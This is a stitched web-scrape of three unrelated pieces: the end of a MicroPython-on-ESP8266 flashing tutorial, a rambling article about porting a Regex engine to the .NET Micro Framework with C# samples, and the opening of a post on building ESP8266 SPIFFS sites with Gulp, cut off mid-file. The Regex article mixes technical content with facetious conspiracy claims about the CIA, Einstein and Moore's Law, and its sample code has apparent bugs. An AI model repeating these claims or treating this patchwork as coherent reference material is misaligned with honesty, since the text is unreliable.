(from esptool) (0.13) Collecting pyaes (from esptool) Downloading Requirement already satisfied: pyserial>=3.0 in /usr/lib/python3/dist-packages (from esptool) (3.4) Building wheels for collected packages: esptool, pyaes Running setup.py bdist_wheel for esptool ... done Stored in directory: /root/.cache/pip/wheels/56/9e/fd/06e784bf9c77e9278297536f3df36a46941c885eb23593bb16 Running setup.py bdist_wheel for pyaes ... done Stored in directory: /root/.cache/pip/wheels/bd/cf/7b/ced9e8f28c50ed666728e8ab178ffedeb9d06f6a10f85d6432 Successfully built esptool pyaes Installing collected packages: pyaes, esptool Successfully installed esptool-2.8 pyaes-1.6.1 To verify the tool is working, you can run esptool.py and look for the following output. esptool.py esptool.py v2.8 usage: esptool [-h] [--chip {auto,esp8266,esp32}] [--port PORT] [--baud BAUD] [--before {default_reset,no_reset,no_reset_no_sync}] [--after {hard_reset,soft_reset,no_reset}] [--no-stub] [--trace] [--override-vddsdio [{1.8V,1.9V,OFF}]] {load_ram,dump_mem,read_mem,write_mem,write_flash,run,image_info,make_image,elf2image,read_mac,chip_id,flash_id,read_flash_status,write_flash_status,read_flash,verify_flash,erase_flash,erase_region,version} ... esptool.py v2.8 - ESP8266 ROM Bootloader Utility positional arguments: {load_ram,dump_mem,read_mem,write_mem,write_flash,run,image_info,make_image,elf2image,read_mac,chip_id,flash_id,read_flash_status,write_flash_status,read_flash,verify_flash,erase_flash,erase_region_status Read SPI flash status register write_flash_status Write SPI flash status register read_flash Read SPI flash content verify_flash Verify a binary blob against flash erase_flash Perform Chip Erase on SPI flash erase_region Erase a region of the flash version Print esptool version optional arguments: -h, --help show this help message and exit --chip {auto,esp8266,esp32}, -c {auto,esp8266,esp32} Target chip type --port PORT, -p PORT Serial port device --baud BAUD, -b BAUD Serial port baud rate used when flashing/reading --before {default_reset,no_reset,no_reset_no_sync} What to do before connecting to the chip --after {hard_reset,soft_reset,no_reset}, -a {hard_reset,soft_reset,no_reset} What to do after esptool.py is finished --no-stub Disable launching the flasher stub, only talk to ROM bootloader. Some features will not be available. --trace, -t Enable trace-level output of esptool.py interactions. --override-vddsdio [{1.8V,1.9V,OFF}] Override ESP32 VDDSDIO internal voltage regulator (use with care) You can also see the many options available to us. We'll be taking advantage of the erase and flash functions to introduce the right binary to our microcontroller. Step 2: Identify Your Serial Port We'll have to find the serial address of our ESP8266. To do so in Linux, we can use the following command. Make sure you're ESP8266 board is plugged into your computer or it won't find anything. ~$ dmesg | grep tty /dev/cu.Bluetooth-Incoming-Port /dev/cu.usbserial-14140 /dev/cu.MALS /dev/cu.wchusbserial14140 In macOS, the command and output look like this: ~$ ls /dev/cu.* /dev/cu.Bluetooth-Incoming-Port /dev/cu.usbserial-14140 /dev/cu.MALS /dev/cu.wchusbserial14140 The correct address here to use is /dev/cu.wchusbserial14140 even though both it and /dev/cu.usbserial-14140 are associated with our ESP8266. You can identify which are tied to your device by unplugging it and re-running the command to see the difference. Once you know where to find your ESP8266 on the system, it's time to erase and flash it. Step 3: Erase the ESP8266 With the correct serial address from before, we'll use the following command to erase our ESP8266, making sure to change your --port value to the address of the ESP8266 you've found on your system. ~$ esptool.py --port /dev/cu.wchusbserial14140 erase_flash... Erasing flash (this may take a while)... Once we see the output, we're ready to upload a MicroPython binary to our board and get started. Step 4: Download the Firmware Binary We'll need to download the most recent MicroPython binary for our ESP8266. You can do so from the official MicroPython downloads page. When that's done, we'll be able to use the esptool to flash it to our now-empty board. Step 5: Flash Your Firmware to the Board To flash our firmware, we'll need to use a command in the following format, making sure to replace the serial port and path to the firmware binary with the ones you're working with. ~$ esptool.py --port SERIAL_PORT --baud 460800 write_flash --flash_size=detect 0 FIRMWARE.BIN Upon running the command, you should see output like below. esptool.py --port /dev/cu.wchusbserial14140 --baud 460800 write_flash --flash_size=detect 0 /Users/skickar/Downloads/esp8266-20190529-v1.11.bin... Changing baud rate to 460800 Changed. Configuring flash size... Auto-detected Flash size: 4MB Flash params set to 0x0040 Compressed 617880 bytes to 402086... Wrote 617880 bytes (402086 compressed) at 0x00000000 in 9.6 seconds (effective 514.5 kbit/s)... Hash of data verified. Leaving... Hard resetting via RTS pin... After allowing the esptool to finish writing to the board, you should have the ability to connect via a MicroPython REPL interface! Step 6: Enter MicroPython REPL To connect to the command-line interface, use the following format in a terminal window, making sure to replace the serial port with the one your device is using. ~$ screen SERIAL_PORT 115200 On a Windows system, you'll need to use Putty to connect over Telnet instead. Once you connect, you should see a prompt like below. C:\> MicroPython v1.11-8-g48dcbbe60 on 2019-05-29; ESP module with ESP8266 Type "help()" for more information. >>> To exit, you can hit Control-K to kill the window. From inside our prompt, we can run a short piece of code to confirm we're able to run Python on the ESP8266. >>>>> print(x) Hello World Now that we've got MicroPython running, let's try out a few commands to work with outputs. Step 7: MicroPython Basics In our MicroPython REPL shell, let's run the following two lines to see if we're able to control hardware successfully. After looking up the D1 Mini's pinout diagram, we can see that the internal LED is located on pin 2, or D4 on the silkscreen. >>> from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT) # Imports modules and defines output pin 5 >>> while True: led.on(); sleep(1); led.off(); sleep(1) # Blinks LED on and off forever ... You should see the LED on your D1 Mini start to blink off and on once per second! You can press Control-C to stop the program. Step 8: Uploading a Python Program Now we can add an output to see if we can control external components. I'll be using an RGB LED, but you can use three regular LEDs as well. I'll be plugging the red, green, and blue wires from the LED into GPIO pins 0, 2, and 4. This works out to pins D2, D3, and D4 on the silkscreen. Now, we'll need to install Adafruit Ampy. We can do this in a fresh terminal window with the following command. ~$ pip3 install adafruit-ampy Collecting adafruit-ampy Downloading Requirement already satisfied: click in /usr/lib/python3/dist-packages (from adafruit-ampy) (7.0) Collecting python-dotenv (from adafruit-ampy) Downloading Requirement already satisfied: pyserial in /usr/lib/python3/dist-packages (from adafruit-ampy) (3.4) Installing collected packages: python-dotenv, adafruit-ampy Successfully installed adafruit-ampy-1.0.7 python-dotenv-0.10.3 Once Ampy is installed, we can use the format ampy --port /serial/port run test.py to run a Python file on our connected board. To pulse our RGB LED, type nano fades.py to create a blank Python file, then paste the following code into it. import time; from machine import Pin, PWM; list = [0,2,4] def PWMChange(pinNumber, intensity, delayTime): pwm2 = PWM(Pin(pinNumber), freq=20000, duty=intensity); time.sleep_ms(delayTime) def flashing(): for elements in list: PWMChange(elements, 0, 10) for elements in list: for i in range (0,255): PWMChange(elements, i, 10) if i > 253: for i in range(255, 0, -1): PWMChange(elements, i, 10) while True: flashing(); Now, save the file by typing Control-X and Y confirm. To run the file on the board, confirm you have the correct serial port and then type the following command, after swapping out /dev/cu.wchusbserial14440 for the serial port of your board. ~$ ampy --port /dev/cu.wchusbserial14440 run fades.py You should see the code start to run on your board! If you want your code to run at boot (but not on a loop) like an Arduino, you'll need to replace the "main.py" file on the board. You can upload our Python file and replace the main.py file on the board with the following command. ~$ ampy -p /dev/cu.wchusbserial14440 put fades.py /main.py With this command, our board will run the program we just uploaded, but not in a loop like an Arduino, unless you specify this with an endless loop as we did in the code above. "While true" loops run forever and don't give the board a chance to boot if they have replaced the main.py, but you can stop the program in the seral REPL by pressing Control-C and then erasing the board to fix the issue. MicroPython Can Control Hardware in a Single Line of Code In a few short steps, we've set up an ESP8266 microcontroller to work with MicroPython and learned the basics of working with outputs. We've also gone from running code line by line in the REPL shell to writing Python files and both running and uploading them to our board. To learn more about what you can do with MicroPython, I highly recommend checking out the official documentation on the MicroPython website. I hope you enjoyed this guide to getting started with MicroPython on the ESP8266! If you have any questions about this tutorial on MicroPython, leave a comment below, and feel free to reach me on Twitter @KodyKinzie. - Follow Null Byte on Twitter, Flipboard, and YouTube Be the First to Comment Share Your Thoughts
https://null-byte.wonderhowto.com/how-to/get-started-with-micropython-for-esp8266-microcontrollers-0210302/
CC-MAIN-2020-05
refinedweb
2,616
64
It was August the 18th 2011. The article was. The Regular Expression implementation for the .NET Micro Framework has just been publicly mentioned. The pressure was on for the community to find bugs and sure enough after some time with hungry developers using the library a bug was eventually found however not in the RegEx engine, with the StringBuilder (which was also contributed by myself). After promptly fixing the issue in less than 24 hours immediately tested other supported expressions and even utilized my new feature of cycle timing to ensure I was not wandering around into the unmanaged void and creating an access violations on accident. The main purpose of this article is to decide if the missing methods have any impact on the developers utilizing the library and if further development is even warranted based on this article. The latter purpose is to ensure that the differences as well as similarities are appropriately highlighted and that the cycle timing feature is explained in way which makes it easy for existing Regex users to understand and use in the same way and last but not least to provide a few laughs at the expense of time alone.. With respect to the developers of the Regular Expression syntax and by virtue of the inventors of the Unix Operating System, not to mention by merit the creator of the language which powered it, I will say that Regular Expressions are nothing more than a mythical black box. It was with great pride that I learned how the great theory of Automata was formed and implemented. I was filled with the odes of joy when I learned there were even two separate possible representations which reflected what I like to envision as biased and unbiased, Deterministic Finite Automata and Nondeterministic Finite Automata. It was even a greater feeling when I learned that you could convert between the two and that there was really no difference, save performance or instructions required to complete the determination. It was with great sadness and .... or ‘Murderous Intent’ that I learned via the history of time through research that both schools of thought were never unified and battled endlessly, such as the physicists did which inspired some of their reasoning. The disease of difference was forever engrained into the minds of programmers and the symptoms were that each one would be naive and utilize DFA minimization or other equivalence principles until they woke up and realized that the problem could and should be solved by combining compiled and evolving the features into RegExNext or such. Even after most realized this, they rather implemented various interpreters into their language implementations and utilized them in an attempted conspiracy to force the failure or Moore’s Law prematurely and also allow the notion of high capacity hard disks to take off. While initially successful, this plot was thwarted by a flood and newer solid state technology which actually then benefited the campaign by forcing a rise in cost as well ensuring that solid state technology had the required money for research. Without exposing my CIA handler and the methods in which I have confirmed these various operations, I know that my story may seem highly suspicious, however, what I can say is that I employ you to look into Einstein and how he just so happened to want to escape to America and how he then came up with General Relativity. I will also say that a proper use of common sense combined with good design and optimization can always outperform a Regular Expression engine (hands down/up). Now with that out of the way, I will move onto the meat of the article which I hope is what you came here looking for rather than my delusional ramblings which only have a slight possibility of being related and a even smaller margin of actually being true. Please be active and leave feedback if you care about kittens. Users typically utilize Regular Expressions as a way to exploit what seems like a short cut through some seemingly complex string handling task. But before we begin to get into the main point of how to use the library and how it differs from the full framework implementation, I will ask that we take a second to realize other possible utilizations for Regular Expressions. A developer can use Regular Expressions to actually do quite a bit of work on binary data as well. Once you learn a bit about string encoding and you get into more complex Regular Expressions (herein known as Regex(‘s)), or if you already do, then you can skip down to the main points and examples. You can use Regex’s to match sections of logic in a code analysis as well as use them to get relevant or similar portions of an image from another image among many other variations of the string matching technique which is still applicable since a char is a byte and vice versa and there is no loss or even a conversion which is done. There is more like a typedef or an alias which takes place to provide these constructs to a developer. typedef Now possibly with your mind even more confused than what it was before or possibly enlightened or even argumentative, I will ask that we let this go for now and move onto the main points. The new Timing mechanism a.k.a. RegexOptions.Timed is used to ensure that a match operation does not take longer than the given amount of time defined in ticks. RegexOptions.Timed This was easily achieved by ensuring that the given amount of ticks elapsed since the initial execution was compared via the following code: //If we are keeping time and the time we started matching at is more then MaxTick //ticks ago something went wrong allow for a break - JRF if (timed && (DateTime.Now.Ticks - startTicks) >= MaxTick) throw new RegexExecutionTimeException(idxStart); else startTicks = DateTime.Now.Ticks; It ensures that expressions which include possible endless results such as '\w+' o0r '\b+\' are safely executed and the system is not wasting time needlessly attempting to match. I also pondered the possibility of adding a Regex.Lazy flag which would optionally sleep for the given ticks and then possibly increase the allocated ticks until exception. Regex.Lazy The RegexExecutionTimeException class takes the position in the match stack and then allows the catcher to restart the matching process either over or later by providing the index last evaluated and keeping the stack registers and the class state in the same state as before the exception. Below you will find a meaningless example: RegexExecutionTimeException int catchCount = 0; //Should match for a long time and throw the Timing Excpetion //This could be changed up a bit to show partial matching string pattern = @"\b(?:(\w+))\s+(\1)\b+"; Regex rx = new Regex(pattern, RegexOptions.IgnoreCase | RegexOptions.Timed); rx.MaxTick = ushort.MaxValue * 2; // Define a test string. string text = "The the quick brown fox fox jumped over the lazy dog dog."; int start = 0; TryToMatch: try { // Find matches. MatchCollection matches = rx.Matches(text, start); //Log.Comment("Found Matches:" + matches.Count); //If we get here you have a really fast processor and timing is not working as expected return MFTestResults.Fail; } catch (RegexExecutionTimeException ex) { if (++catchCount > 5) return MFTestResults.Pass; else { //Try to match again at the index //Could check index or access the Groups //up the Index here but in this example we never matched. start = ex.Index; goto TryToMatch; } } catch { return; } A user can find a better value for the MaxTick value by performing matches on strings with known results to obtain a statistic which may be applied in an algorithm or lack thereof to ensure stricter operation. The default value is long.MaxValue / 2. MaxTick long.MaxValue / 2 I thought of adding a Profile method which was internal, however, I could not get feedback on the implementation let alone did I want to start adding even more nonsense to a seemingly happy theory and science which did not accept change without what seemed like great loss in both dignity and pride which is of obviously the worst philosophical sin in my humble opinion(s) at the current time of this writing. Profile I am not sure of other implementations which have this feature let alone humans who have also expressed such concerns or ideas such as but not limited to the ones I have listed in this writing nor am I sure that it is a aspect relevant to this article... You will see from the following Test example that the syntax with respect to the perspective of the C# compiler from the full framework has been kept as close as possible and no such deviation has been applied to either it or the StringBuilder class. StringBuilder //MSDN Test from string input = "int[] values = { 1, 2, 3 };\n" + "for (int ctr = values.GetLowerBound(1); ctr <= values.GetUpperBound(1); ctr++)\n" + "{\n" + " Console.Write(values[ctr]);\n" + " if (ctr < values.GetUpperBound(1))\n" + " Console.Write(\", \");\n" + "}\n" + "Console.WriteLine();\n"; string pattern = "Console.Write(Line)?"; Match match = Regex.Match(input, pattern); int matchCount = 0; string expected0 = null; string expected1 = null; while (match.Success) { Log.Comment("'" + match.Value + "' found in the source code at position " + match.Index + "."); if (matchCount == 0) expected0 = match.ToString(); else if (matchCount == 2) expected1 = match.ToString(); match = match.NextMatch(); ++matchCount; } return matchCount == 3 && expected0 == "Console.Write" && expected1 == "Console.WriteLine" ? MFTestResults.Pass : MFTestResults.Fail; You will also see that MatchCollection is present. MatchCollection //. Log.Comment(matches.Count + " matches found in:\n " + text); // Report on each match. foreach (Match match in matches) { GroupCollection groups = match.Groups; Log.Comment("'" + groups["word"].Value + "'" + " repeated at positions " + groups[0].Index + " and " + groups[1].Index); } //Required Named Capture return MFTestResults.Pass; } catch { //Known to Fail until Named Capture is implemented //See return MFTestResults.KnownFailure; } We will now begin to explore the differences with respect to the Jakarta library from which the code was ported and the full framework implementation. // Define a regular expression for repeated words. //Was trying to add ?: to the second group to force its presence //atleast once but you cant use back references when you do this with this engine, //there must be another way! //Has correct Index's but extra matches!!! //@"\b(?:\w+)\s+(\1)\b" //pattern = @"\b(?:\w+)\s+((\s+(\1))\b)"; ////Only 1 Match //pattern = @"\b(\w+)\s+\w+(\k\1)\b"; //Almost perfect //pattern = @"\b(?:\w+)\s+(\w+)\1\b"; //Correct Positions //pattern = @"\b(?:\w+)\s+(\w+\1)\b"; //Correct Positions extra matches //pattern = @"\b(\w+)\b" //pattern = @"\b\w+\s+\b(\1)" //These both work in Jakarta Applet... check for bugs // string pattern = @"\b(?:(\w+))\s+(\1)\b"; //string pattern = @"\b(\w+)\s+\1\b"; Regex rx = new Regex(pattern, RegexOptions.IgnoreCase); // Define a test string. string text = "The the quick brown fox fox jumped over the lazy dog dog."; //Need dumpProgram to determine if my compiler compiled the same... I //think the problem lies in the Match object... I am not passing something //correclty to the concstructor.... // Find matches. MatchCollection matches = rx.Matches(text); TestTestsHelper.ShowParens(ref rx); // Report the number of matches found. Log.Comment(matches.Count + " matches found in:\n " + text); // Report on each match. foreach (Match match in matches) { GroupCollection groups = match.Groups; Log.Comment("'" + groups[0].Value + "'" + " repeated at positions " + groups[0].Index + " and " + groups[1].Index); } //May be bugs in engine but is likely due to differences in Regex //engines because I have no implemented Transfer Caputre, //this is known to Fail for now so long as no exception is thrown. return MFTestResults.KnownFailure; } catch { return MFTestResults.Fail; } From the code example and comments above you will see that the changes to the engine are giving some results which may not be expected at first with respect to either of the other implementations. This is a classic problem in Regex implementations and great care is needed to ensure that the theory is followed as closely as possible to ensure compatiblity. Overall this was the hardest part because of the notion of UTF-8 encoding in the micro framework and the unicode in the full framework. I was even tempted to use shorts rather than char’s for the opcodes for this very reason however it turned out that it would be okay in the end without such drastic changes. The bottom line is that the results are inline with what the Full Framework will return under mostly all circumstances when using syntax that is supported. For example, Named capture is NOT supported however it would be trivial to add to the current implementation as the members are already present and the engine just needs small changes to make it actually work.. (Which may end up being another article in this series depending on the feedback) the same with various other parts of the syntax which could and may very well be added depending on how the feedback and community discussion coalesce combined with how my work load is dealt with. The implementation also keeps a Cache of recently compiled regular expressions (just like the full framework implementation). The cache can be cleared by setting the static member Regex.CacheSize to -1 which clears the cache and prevents newly compiled expressions from being added. The default cache size is 25 instances at which point they will be recycled on a FILO basis from the cache. What’s Missing or Different? In the 4.2 implementation there are some members and methods missing from the Regex class e.g. those for operating on a Capture. I will elaborate further and you will hopefully decide if this impacts development.... For example take the previously stated issue on UTF-8 vs Unicode characters and the following code example. /* // The example displays the following output: // : Microsoft // : Excel // : Access // : Outlook // : PowerPoint // : Silverlight // Found 6 trademarks or registered trademarks. */ bool result = true; int expectedCount = 6; string pattern = @"\b(\w+?)([ ])"; string input = "Microsoft Office Professional Edition combines several office " + "productivity products, including Word, Excel , Access , Outlook , " + "PowerPoint , and several others. Some guidelines for creating " + "corporate documents using these productivity tools are available " + "from the documents created using Silverlight on the corporate " + "intranet site."; Regex test = new Regex(pattern); MatchCollection matches = test.Matches(input); foreach (Match match in matches) { GroupCollection groups = match.Groups; Log.Comment(groups[2] + ": " + groups[1]); } Log.Comment("Found "+matches.Count+" trademarks or registered trademarks."); if (matches.Count != expectedCount) { result = false; } if (matches[0].ToString() != "Microsoft ") { result = false; } else if (matches[1].ToString() != "Excel ") { result = false; } else if (matches[2].ToString() != "Access ") { result = false; } else if (matches[3].ToString() != "Outlook ") { result = false; } else if (matches[4].ToString() != "PowerPoint ") { result = false; } else if (matches[5].ToString() != "Silverlight ") { result = false; } return result ? MFTestResults.Pass : MFTestResults.Fail; The weird character is supposed to be either ©, ™, ℠, or ® however with the UTF-8 encoding at use in the framework this was not a ‘showstopper’ as people would basically just have to understand this platform difference, I could have ended up doing something weird or fancy to try and solve this however I also see the framework growing and supporting various different locales so I will have to wait for feedback to determine how much of a pain in the ass this really is, I suspect since that this can also technically happen on the full framework if you are not careful and that it is not a big as deal as I am making it however I will also say that the character literals may not been the best way to match and that there might be a need for specific codes to be given as well as encoding in future expression syntax parsers, either that or at least an Encoding member of the Regex class itself to ensure that it can optionally matching against alternate encoding. The entire process of porting the code took all of 4 hours if that. I was compiling expression strings into complete RegexProgram’s and all of the tests passed! I was very happy with myself because I did not end up using a code tool to do the port, I did it by hand and the results spoke for themselves. Because of this I was able to jump in and out of the code as if it was my own. Some of the comments were lacking but I did my best to ensure that a proper description was given to methods and that each line which was even remotely hard to read has some type of comment ensuring future developers would understand why I was using the variables in the series I was et al;I basically then started top down with MSDN examples which I knew had to produce consistent results across both implementations. This is where the headaches started, the matching was as per the theory in the engine however the names of the members were totally different that in the full framework implementations. The API was also vastly different. This took about another 2 or 3 days to get completely right with no tests failing from the ported libraries unit test code. The code reviewer I was working with had some unfortunate problems so this delayed the review process for my assignment about 2 whole months. After Microsoft saw I was so bored that I did a complete WebSocket implementation in less than 48 hours they emailed me and the code reviewer to find out why I was now working on WebSockets... long story short Lorenzo directly reviewed and helped me make some decisions such as to redo the StringBuilder from the full framework code and then to also implement the minimal set of methods which would enable the MSDN examples to pass using the same code. This sounded like it would be easy at first however I quickly learned that this is where the engines were most different and the the full framework implementation utilizes various specialized matching algorithms based on the expression given and the theories behind each of the matching algorithms. Without getting too caught up in NFA and DFA or BoyerMoore and Thompson I just made the properties named as per the full framework implementation and this was easy to do, I even promoted and demoted a few fields and properties and things still worked but some of the MSDN examples required the Match, MatchCollection, Capture, and Group classes. Match Capture Group So I began porting them directly over from the full framework to ensure the API was the same and that the results returned from the examples would match. I was not allowed to take the method such as Pop and Crawl from the full framework without first demonstrating that I understood the code and that I did have a conforming implementation which required the full framework methods not because I wanted to be lazy but because I wanted to ensure that the results returned from my class were consistent with the full framework and I also wanted to ensure the Reflected calls were similar to what was on the Full Framework. This notion eventually caught on when I was able to demonstrate within 1 week that there were only some very small issues and that I had everything save a few small features missing. We will now take some time to explore what is missing or different about the implementation and even give some interesting ideas for future implementations. The main theory of the ported code is to create a RegexProgram from the given expression. This program is essentially a state machine which allows it to have certain functions e.g. IsMatch which allow the program to return meaningful results such as true or false or the index of the match inter alia. RegexProgram There is a Regex Compiler class which is responsible for taking the given expression and compiling it into a RegexProgram instance. There is a DebugRegexCompiler which exposes a few exceptions which are typically used for debugging and bug testing but can be used in runtime with a dynamically created regular expressions. DebugRegexCompiler using System; using System.Text; using System.Collections; namespace System.Text.RegularExpressions { #if DEBUG /// <summary> /// A subclass of RECompiler which can dump a regular expression program for debugging purposes. /// </summary> public class RegexDebugCompiler : RegexCompiler { /// <summary> /// Mapping from opcodes to descriptive strings /// </summary> static Hashtable hashOpcode = new Hashtable() { {OpCode.ReluctantStar, "Star"}, {OpCode.ReluctantPlus, "ReluctantPlus"}, {OpCode.ReluctantMaybe, "ReluctantMaybe"}, {OpCode.EndProgram, "EndProgram"}, {OpCode.BeginOfLine, "BeginOfLine"}, {OpCode.EndOfLine, "EndOfLine"}, {OpCode.Any, "Any"}, {OpCode.AnyOf, "AnyOf"}, {OpCode.Branch, "Branch"}, {OpCode.Atom, "Atom"}, {OpCode.Star, "Star"}, {OpCode.Plus, "Plus"}, {OpCode.Maybe, "Maybe"}, {OpCode.Nothing, "Nothing"}, {OpCode.GoTo, "GoTo"}, {OpCode.Continue, "Continue"}, {OpCode.Escape, "Escape"}, {OpCode.Open, "Open"}, {OpCode.Close, "Close"}, {OpCode.BackRef, "BackRef"}, {OpCode.PosixClass, "PosixClass"}, {OpCode.OpenCluster, "OpenCluster"}, {OpCode.CloseCluster, "CloseCluster"} }; /// <summary> /// Returns a descriptive string for an opcode. /// </summary> /// <param name="opcode">Opcode to convert to a string</param> /// <returns> Description of opcode</returns> String OpcodeToString(char opcode) { // Get string for opcode String ret = (String)hashOpcode[opcode]; // Just in case we have a corrupt program if (ret == null) { ret = "UNKNOWN_OPCODE"; } return ret; } /// <summary> /// Return a string describing a (possibly unprintable) character. /// </summary> /// <param name="c">Character to convert to a printable representation</param> /// <returns>String representation of character</returns> String CharToString(char c) { // If it's unprintable, convert to '\###' if (c < ' ' || c > 127) { return "\\" + (int)c; } // Return the character as a string return c.ToString(); } /// <summary> /// Returns a descriptive string for a node in a regular expression program. /// </summary> /// <param name="node">Node to describe</param> /// <returns>Description of node</returns> String NodeToString(int node) { // Get opcode and opdata for node char opcode = Instructions[node /* + RE.offsetOpcode */]; int opdata = (int)Instructions[node + Regex.offsetOpdata]; // Return opcode as a string and opdata value return OpcodeToString(opcode) + ", opdata = " + opdata; } /// <summary> /// Dumps the current program to a {@link PrintStream}. /// </summary> /// <param name="p">PrintStream for program dump output</param> public void DumpProgram(System.IO.TextWriter p) { // Loop through the whole program for (int i = 0, e = Instructions.Length; i < e; ) { // Get opcode, opdata and next fields of current program node char opcode = Instructions[i /* + RE.offsetOpcode */]; char opdata = Instructions[i + Regex.offsetOpdata]; int next = (short)Instructions[i + Regex.offsetNext]; // Display the current program node p.Write(i + ". " + NodeToString(i) + ", next = "); // If there's no next, say 'none', otherwise give absolute index of next node if (next == 0) { p.Write("none"); } else { p.Write(i + next); } // Move past node i += Regex.nodeSize; // If character class if (opcode == OpCode.AnyOf) { // Opening bracket for start of char class p.Write(", ["); // Show each range in the char class // int rangeCount = opdata; for (int r = 0; r < opdata; r++) { // Get first and last chars in range char charFirst = Instructions[i++]; char charLast = Instructions[i++]; // Print range as X-Y, unless range encompasses only one char if (charFirst == charLast) { p.Write(CharToString(charFirst)); } else { p.Write(CharToString(charFirst) + "-" + CharToString(charLast)); } } // Annotate the end of the char class p.Write("]"); } // If atom if (opcode == OpCode.Atom) { // Open quote p.Write(", \""); // Print each character in the atom for (int len = opdata; len-- != 0; ) { p.Write(CharToString(Instructions[i++])); } // Close quote p.Write("\""); } // Print a newline p.WriteLine(""); } } /// <summary> /// Dumps the current program to a <code>System.out</code>. /// </summary> public void dumpProgram() { //PrintStream w = new PrintStream(System.out); //dumpProgram(w); //w.flush(); } } #endif } You can even compile regular expressions into RegexProgram instance’s and then either serialize them or store their bytecode on a SD card using reflection and then set it back once you instantiate the Regex Class after a reboot. There is a class RegexPrecompiler which can be used either under the emulator or on the hardware which is specially designed for this purpose. RegexPrecompiler using System; using Microsoft.SPOT; namespace System.Text.RegularExpressions { /// <summary> /// Class for precompiling regular expressions for later use /// </summary> public class RegexPrecompiler { /// <summary> /// Main application entrypoint. /// Might make this have methods and be a class rathern the a program... /// Then the class can Serialise and Deserialiaze the Regexps /// </summary> /// <param name="arg">Command line arguments</param> static public void Main(String[] arg) { // Create a compiler object RegexCompiler r = new RegexCompiler(); // Print usage if arguments are incorrect if (arg.Length <= 0 || arg.Length % 2 != 0) { Debug.Print("Usage: recompile <patternname> <pattern>"); return; } // Loop through arguments, compiling each for (int i = 0, end = arg.Length; i < end; i += 2) { try { // Compile regular expression String name = arg[i]; String pattern = arg[i + 1]; String instructions = name + "Instructions"; // Output program as a nice, formatted char array Debug.Print("\n // Pre-compiled regular expression '" + pattern + "'\n" + " private static char[] " + instructions + " = \n {"); // Compile program for pattern RegexProgram program = r.Compile(pattern); // Number of columns in output int numColumns = 7; // Loop through program char[] p = program.Instructions; for (int j = 0; j < p.Length; j++) { // End of column? if ((j % numColumns) == 0) Debug.Print("\n "); // Print char as padded hex number String hex = (0).ToHexString(); while (hex.Length < 4) hex = "0" + hex; Debug.Print("0x" + hex + ", "); } // End of program block Debug.Print("\n };"); Debug.Print("\n private static REProgram " + name + " = new REProgram(" + instructions + ");"); } catch (RegexpSyntaxException e) { Debug.Print("Syntax error in expression \"" + arg[i] + "\": " + e.ToString()); } catch (Exception e) { Debug.Print("Unexpected exception: " + e.ToString()); } } } } } All in all the assignment took about 4 months from first copy / paste to the final submittal to Microsoft. (And mind you this was with no other documentation or help (by anyone) other than that you [The Reader] would have if you did this yourself). Fortunately everyone was pleased and apparently there were no bugs which increased my confidence in my skills and caused my reputation to start to go to my head. In the end If I could do it again I probably would take more of an initiative into getting the syntax and engine the way I wanted it while adding methods for special localized matching in a expression. E.g. something ruff like this: //In less than 65535 ticks match the given expression ‘(\.?\)’, pass the results into the function present and return the result. “\ \In{65535} (\.?\) \-> EvaluateMatch\” //Where EvaluateMatch is a MatchEvaluator or similar //In less than 65535 ticks match the given expression ‘(\b+)’, pass the results into the function which sleeps for 100 milliseconds and returns the match.“\ \In{100} (\b+) \-> { Sleep(_GivenTime_); return $1; }\” //_GivenTime_ would implicitly be 100 because it has been given to the In construct. I would also change how some of the compiling is done by making it use more of the CLR string methods where possible rather than compiling my own type but this may be too much for the micro framework to perform dynamically at this time although it technically is possible. I imagine if language implementations in general utilized this syntax then reflection and scripting would be something built into every language after there was a conforming regular expression engine. I think this is what the original implementer's had in mind when developing ‘Regular Expressions’ however everyone got caught up in the math and then we remembers it was math with strings and forgot that strings are just bytes as well... In closing I would also have liked to see more methods related to binary matching however to each implementation their own, a developer could easily wrap the Regex class and still create it with ease. If I could change the full framework implementation the only changes I make would be a reduction in the amount of classes that actually perform the various types of matches and state machine conversions. A single superclass would be created and it would analyze the expression taking into account the string given to match. It would determine the branches to use and build up a RegexProgram which contained branches which were specially optimized for the given string rather than defaulting to a single algorithm based on a few cheesy checks. This would allow all types of node searching logics to be applied dynamically in a single match without using any more overhead than is currently utilized in the implementation. You can see the two original MSDN articles by Collin Miller here: Here’s cool article which has nothing to do with the Micro Framework but does explain how to convert Regular Expressions to NFA -> DFA works and does have illustrations and is written by academic sources:..
http://www.codeproject.com/Articles/386890/String-Manipulation-in-the-NET-Micro-Framework
CC-MAIN-2014-49
refinedweb
4,709
53.51
The ESP8266 flash layout defines a series of blocks of memory for each “partition”. There is a block for the user code (the “sketch”), there is a block for the OTA update file, another one for the emulated EEPROM, another for the WIFI configuration and one for the File System. This last one uses Peter Andersson’s SPIFFS (SPI Flash File System) code to store files in a similar fashion our computers do, but taking into account the special requirements of an embedded system and a flash memory chip. This is great because we can store a whole static website there (html, css, js, images,…) and use the official WebServer library that comes with the Arduino Core for ESP8266 project to serve files and execute server side code that updates our static site via AJAX or WebSockets, for instance. But the ESP8266 is nothing more than a (powerful) microcontroller and the WebServer library has its limitations and if you start to work on a complex website, with multiple files (stylesheets, scripts,…) it will soon fail… Size is not that important, but the number of files is. Too many files lead to failed downloads and long rendering times… The solution is merging. All javascript files together, all stylesheet files together. But what if you are using third party files, some of them minified? What if you want to keep them separated so you can easily swap from one component to another by just removing a line and adding a new one to your HTML file? You will need some way to process your HTML to get the scripts and stylesheets you are using, merge them and replace the references in the HTML with the unified file. Well, that’s what most web developers do on a daily basis. They work on a development version and they “process it” to get working code (clean, minimized, renderable). They even have “watchers” that work in the background translating every modification they do on the development version in real time. To do that they use compilers (for SASS, LESS, CoffeeScript,…) and build managers. One of such build managers is Gulp. So why not use Gulp to process our website before uploading it? Why? So let’s do it. Installing Gulp Gulp is actually a Node.js module which is great since Node.js is a really powerful frontend and scripting language and the building file that we will code can benefit from all that power. Installing Node.js and npm (Node.js packet manager) is out of scope here so visit Node.js download page and help yourself. Next we will need a file to define all the module dependencies we are going to use. These modules are gulp itself and some gulp plugins that will take care of the different tasks (minimizing, injecting, cleaning,…). Lets take a look at it: { "name": "esp8266-filesystem-builder", "version": "0.1.0", "description": "Gulp based build script for ESP8266 file system files", "main": "gulpfile.js", "author": "Xose Pérez <[email protected]>", "license": "MIT", "devDependencies": { "del": "^2.2.1", "gulp": "^3.9.1", "gulp-clean-css": "^2.0.10", "gulp-gzip": "^1.4.0", "gulp-htmlmin": "^2.0.0", "gulp-if": "^2.0.1", "gulp-inline": "^0.1.1", 